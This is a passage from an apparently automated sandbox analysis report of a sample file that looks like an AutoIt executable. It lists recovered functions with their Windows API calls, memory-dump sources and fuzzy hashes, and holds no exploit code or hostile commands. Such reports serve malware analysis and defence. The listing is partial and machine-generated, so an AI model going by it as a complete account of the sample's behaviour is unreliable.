Download Yara Rule

APIs

_free.LIBCMT ref: 00252FB5

Part of subcall function 0024395C: __FF_MSGBANNER.LIBCMT ref: 00243973
Part of subcall function 0024395C: __NMSG_WRITE.LIBCMT ref: 0024397A
Part of subcall function 0024395C: RtlAllocateHeap.NTDLL(01830000,00000000,00000001,00000001,00000000,?,?,0023F507,?,0000000E), ref: 0024399F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 0077be176bf045d3ba2f6503cfdcebbaedb7d776ea5903ae8e571bad0fc527ce
Instruction ID: 668efedb8432f154ecbc4ec8334eb631881bee4634e0354bf9a48b544bb8607a
Opcode Fuzzy Hash: 0077be176bf045d3ba2f6503cfdcebbaedb7d776ea5903ae8e571bad0fc527ce
Instruction Fuzzy Hash: 2A11E732578312EBCF257FB0FC846693B94AF113A1F204426FC599A1D1DB74C9B88E94

Function 0026058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002605AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002605C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002605DD
FreeLibrary.KERNEL32(?), ref: 00260632

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 2f2d49211fb66aeb809d54e109a24b2a9f12a721e1e19f98e886bd334966bdf6
Instruction ID: c05384a083e12fdc3706f7faa2b44f80f179a306d7eb14283e2e615ce4964f42
Opcode Fuzzy Hash: 2f2d49211fb66aeb809d54e109a24b2a9f12a721e1e19f98e886bd334966bdf6
Instruction Fuzzy Hash: 1B218171910209EFDB208F91ECC8ADBBBBCEF44700F008469E51796150DBB0EAA5EF50

Function 00266713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00266733
_memset.LIBCMT ref: 00266754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002667A6
CloseHandle.KERNEL32(00000000), ref: 002667AF

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 6f6eb3ceb0cfb8f4964a7d50bb8b9252d0e572a8585d115baf0ac3b4f2b19f5b
Instruction ID: 60c8cab242d89a9ec1e4a459f18ce5c1d7d8ace78eb56216c08018a89c4d7ae6
Opcode Fuzzy Hash: 6f6eb3ceb0cfb8f4964a7d50bb8b9252d0e572a8585d115baf0ac3b4f2b19f5b
Instruction Fuzzy Hash: 64110A71D01228BBE7205BA5AC4DFABBABCEF45724F10419AF505E71C0D6704E80CBA4

Function 0025B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0025AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0025AA79
Part of subcall function 0025AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0025AA83
Part of subcall function 0025AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0025AA92
Part of subcall function 0025AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0025AA99
Part of subcall function 0025AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0025AAAF

GetLengthSid.ADVAPI32(?,00000000,0025ADE4,?,?), ref: 0025B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0025B227
HeapAlloc.KERNEL32(00000000), ref: 0025B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0025B247

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 78bbfffce08e58a97d5301b4cadd0af6175cb6fbea6327c7521c5bb410ae3197
Instruction ID: dc23d138ccc0a52210919e4c86c018b13ad2c00b7bc92cd2276906bfb76d88bb
Opcode Fuzzy Hash: 78bbfffce08e58a97d5301b4cadd0af6175cb6fbea6327c7521c5bb410ae3197
Instruction Fuzzy Hash: 8011C171A10205EFCB059F98EC95AAEB7B9EF85305F14802DED43D7250D731AE58CB24

Function 0025B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0025B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0025B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0025B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0025B4DB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b8e6b926625988791c4d9665362a338c79db0826d1361d3e9f5f35583378ef86
Instruction ID: ad429c84b09f298048fe36f80f210b41061368f191edbda87ab98c9fe651be0d
Opcode Fuzzy Hash: b8e6b926625988791c4d9665362a338c79db0826d1361d3e9f5f35583378ef86
Instruction Fuzzy Hash: C2112E7A900218FFDB11DF99C985E9DBBB4FB08710F204091EA05B7295D771AE11DB94

Function 0023B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0023B5A5
GetClientRect.USER32(?,?), ref: 0029E69A
GetCursorPos.USER32(?), ref: 0029E6A4
ScreenToClient.USER32(?,?), ref: 0029E6AF

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 2454f21bd1fec9e3dc9f6faf325631c3f8a605566aba3ff647f976b4b01f0499
Instruction ID: cdf432be4d324e840f228e2089dd5f0dcb560197cd7f36c0a4c4a0af7f5e6361
Opcode Fuzzy Hash: 2454f21bd1fec9e3dc9f6faf325631c3f8a605566aba3ff647f976b4b01f0499
Instruction Fuzzy Hash: 5D113671A2002ABBCF11DF98E8898AE77BCEB09304F400451FA12E7140D730AAA5CBA1

Function 0026732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00267352
MessageBoxW.USER32(?,?,?,?), ref: 00267385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0026739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002673A2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 70fbb53022116a1b43de69cf64027bd4daf70621134224d79fff8b74ceee8230
Instruction ID: bc7a098064be4488eafd3d0b048aea60817be2ba5d5ce6a0cd139708d7ba6956
Opcode Fuzzy Hash: 70fbb53022116a1b43de69cf64027bd4daf70621134224d79fff8b74ceee8230
Instruction Fuzzy Hash: AD110472A14245AFC701DFA8FC4DA9E7BAD9B45315F144355FD25E33A1DBB08D208BA0

Function 0023D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0023D1BA
GetStockObject.GDI32(00000011), ref: 0023D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0023D1D8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 96ea3d2b5ca569a8a4897bca7b50b18677d7d40115b7db4658f1bfea1d3153b6
Instruction ID: 903f9414a9646fea6d92d7f4ddf479f2811f5156287a2dbe6cf7056a69be6487
Opcode Fuzzy Hash: 96ea3d2b5ca569a8a4897bca7b50b18677d7d40115b7db4658f1bfea1d3153b6
Instruction Fuzzy Hash: EF11ADB251150ABFEF124FA0AC54EEABB6DFF09764F040116FA4952050CB71DD609BA0

Function 00254DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00254E16

Part of subcall function 002554F5: __fltout2.LIBCMT ref: 0025551E

__cftog_l.LIBCMT ref: 00254E3C
__cftoe_l.LIBCMT ref: 00254E6E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: c938b8bdb8509577de6336b0dd0aa4ebe2bfa638756b9661295de168900ca399
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 8F014E3202014ABBCF126E84DC52CEE7F22BB18356B598455FE1859131D336DAB5AB89

Function 00247452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00247A0D: __getptd_noexit.LIBCMT ref: 00247A0E

__lock.LIBCMT ref: 0024748F
InterlockedDecrement.KERNEL32(?), ref: 002474AC
_free.LIBCMT ref: 002474BF
InterlockedIncrement.KERNEL32(018410C0), ref: 002474D7

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: af5a08b9acf0a009812fddd6a9210f25b89f9c3baa70c2c483d60fa35f347dd4
Instruction ID: 7290e0170ab309cf979f2f32fef0f2af35d55a7ebc44d31f55792ee2f400b93c
Opcode Fuzzy Hash: af5a08b9acf0a009812fddd6a9210f25b89f9c3baa70c2c483d60fa35f347dd4
Instruction Fuzzy Hash: EF018036D2AA22ABCB1AAF64A80DB6DBB70BF05710F154046F82477690CB345D61CFD2

Function 0028EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0023AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0023AFE3
Part of subcall function 0023AF83: SelectObject.GDI32(?,00000000), ref: 0023AFF2
Part of subcall function 0023AF83: BeginPath.GDI32(?), ref: 0023B009
Part of subcall function 0023AF83: SelectObject.GDI32(?,00000000), ref: 0023B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0028EA8E
LineTo.GDI32(00000000,?,?), ref: 0028EA9B
EndPath.GDI32(00000000), ref: 0028EAAB
StrokePath.GDI32(00000000), ref: 0028EAB9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: a14e863731d5711414673c07c22747b7c7953f90982d092c807e1118d8041e1a
Instruction ID: 0e63fe405c85c1b96405fb82fde6306b5611cca9a619386861a738b6aa8ae959
Opcode Fuzzy Hash: a14e863731d5711414673c07c22747b7c7953f90982d092c807e1118d8041e1a
Instruction Fuzzy Hash: BFF08231046259BBDB12AFA4BC0DFCE3F19AF07711F144101FA12650E18B759662CB95

Function 0025C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0025C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0025C85D
GetCurrentThreadId.KERNEL32 ref: 0025C864
AttachThreadInput.USER32(00000000), ref: 0025C86B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 1eed25cd5cf69e4ba3a3ca9dc281710a6de3c7c18ef2aac440f6c3199e47c2a8
Instruction ID: 92a8432f48f251589fb747f3cca2c6d74218da3865150036c70665084dac95b7
Opcode Fuzzy Hash: 1eed25cd5cf69e4ba3a3ca9dc281710a6de3c7c18ef2aac440f6c3199e47c2a8
Instruction Fuzzy Hash: D9E03071141224BBDB111F61AC0DEDB7F5CEF067A1F008021BA0E84850DAB19994CBE0

Function 0025B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0025B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0025AC9D), ref: 0025B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0025AC9D), ref: 0025B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0025AC9D), ref: 0025B0F1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 8abcce0e07c10c17861502196c9cccdf499c7405c4d8a443f63d60f1ad4c8ee1
Instruction ID: 074c02292d14fc503bf5f9554194d32420c3d224a021955d765b7afd2cce6d56
Opcode Fuzzy Hash: 8abcce0e07c10c17861502196c9cccdf499c7405c4d8a443f63d60f1ad4c8ee1
Instruction Fuzzy Hash: F4E08672601212ABD7201FB16C0DB473BA8EF56792F018858F643D6080DF349406CB60

Function 0023B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0023B496
SetTextColor.GDI32(?,000000FF), ref: 0023B4A0
SetBkMode.GDI32(?,00000001), ref: 0023B4B5
GetStockObject.GDI32(00000005), ref: 0023B4BD
GetWindowDC.USER32(?,00000000), ref: 0029DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0029DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0029DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0029DE6A
GetPixel.GDI32(00000000,?,?), ref: 0029DE8A
ReleaseDC.USER32(?,00000000), ref: 0029DE95

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 377d47cb79d4ad9a8ddb307d3ae8894fa4488e9e013567452371efbb05dc66c0
Instruction ID: 34cfd63eb3f54d3f35846be0245d3e63c109b0ac12a51c0654466b481d5033f5
Opcode Fuzzy Hash: 377d47cb79d4ad9a8ddb307d3ae8894fa4488e9e013567452371efbb05dc66c0
Instruction Fuzzy Hash: 5CE06D71510241AFDF211F74BC0DBD83B11AB12335F00C266F7AA580E1CB714591DB21

Function 0029B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0029B29A
GetDC.USER32(00000000), ref: 0029B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0029B2C3
ReleaseDC.USER32 ref: 0029B2E2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 8d1c0c6f699e75a23fd149577b321d83ef616726bf2397a7d581150766129c21
Instruction ID: 2a79bbe975bf9606af6957dc96f88692f3153c12da4c4680040797518ba9d2b4
Opcode Fuzzy Hash: 8d1c0c6f699e75a23fd149577b321d83ef616726bf2397a7d581150766129c21
Instruction Fuzzy Hash: 79E012B1920204EFDB015F70B84CA2EBBA8EB4CB51F12C80AFC5B8B610CEB498508B40

Function 0025B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025B2DF
UnloadUserProfile.USERENV(?,?), ref: 0025B2EB
CloseHandle.KERNEL32(?), ref: 0025B2F4
CloseHandle.KERNEL32(?), ref: 0025B2FC

Part of subcall function 0025AB24: GetProcessHeap.KERNEL32(00000000,?,0025A848), ref: 0025AB2B
Part of subcall function 0025AB24: HeapFree.KERNEL32(00000000), ref: 0025AB32

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: ac13efe60a4ba87f9f609f067498b1243a674bd216892290041260d8f46723fd
Instruction ID: 362c0a355d51b2d25b1ab2e13476bc8c4e6b4d639cb2df62c1a665c7a5cdcef2
Opcode Fuzzy Hash: ac13efe60a4ba87f9f609f067498b1243a674bd216892290041260d8f46723fd
Instruction Fuzzy Hash: FCE0B63A104005BBCB012BA5EC0C859FBA6FF9A3213108221FA2681971CF32A871EF91

Function 0029B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0029B2AE
GetDC.USER32(00000000), ref: 0029B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0029B2C3
ReleaseDC.USER32 ref: 0029B2E2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: af28b531160a7d322e38674f9e22dd397111fb544182106d0da2f4c09f0c379a
Instruction ID: 34cc2f25f8bf81be98eba6104a4ab2e63d18cf7e356c34dab1017dd16233667b
Opcode Fuzzy Hash: af28b531160a7d322e38674f9e22dd397111fb544182106d0da2f4c09f0c379a
Instruction Fuzzy Hash: E5E012B1910200EFDB005F70A84C629BBA8EB4D750F12880AF95A8B610CEB998008B00

Function 0025DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0025DEAA

Strings

Container, xrefs: 0025DE29
AutoIt3GUI, xrefs: 0025DE22

Memory Dump Source

